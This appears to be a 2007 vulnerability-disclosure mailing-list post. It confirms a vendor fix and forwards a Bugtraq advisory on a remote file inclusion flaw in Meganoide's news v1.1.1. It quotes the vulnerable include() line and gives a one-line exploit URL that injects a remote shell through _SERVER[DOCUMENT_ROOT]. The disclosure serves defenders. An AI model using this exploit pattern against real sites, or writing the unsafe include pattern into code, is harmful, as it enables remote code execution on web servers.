[VIM] [True] Meganoide's news v1.1.1 < = RFi Vulnerabilities

Noam Rathaus noamr at beyondsecurity.com
Tue Feb 20 05:07:11 EST 2007


Hi,

Vendor appears to confirm problem:
 ----------------------
 Meganoide's news v1.1.2
 -----------------------
 - Bug: possibile inclusione di file remoti nel file "include.php"

(Translation from italian: possible inclusion of files remotely in the 
file "include.php")

----------  Forwarded Message  ----------

Subject: Meganoide's news v1.1.1 < = RFi Vulnerabilities
Date: Friday 16 February 2007 19:54
From: k4rtal at gmail.com
To: bugtraq at securityfocus.com

##################################################################
#Meganoide's news v1.1.1 < = RFi Vulnerabilities
#
#Download :
 http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111 #
#Script Name : Meganoide's news v1.1.1
#
#
##################################################################
#
#Coded By : KaRTaL
#
#
#Contact : k4rtal[at]gmail[dot]com
#
#
##################################################################
#
#V.Code in : [path]/include.php
#
#
#          include("$_SERVER[DOCUMENT_ROOT]/news/config.inc.php");
#
#
#Exploit : www.target.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]
#
#
##################################################################
#
#
#Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa ,
 Gurkan142 , www.istikla-team.org #
#
#
#
##################################################################

-------------------------------------------------------

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr at beyondsecurity.com
  http://www.beyondsecurity.com


More information about the VIM mailing list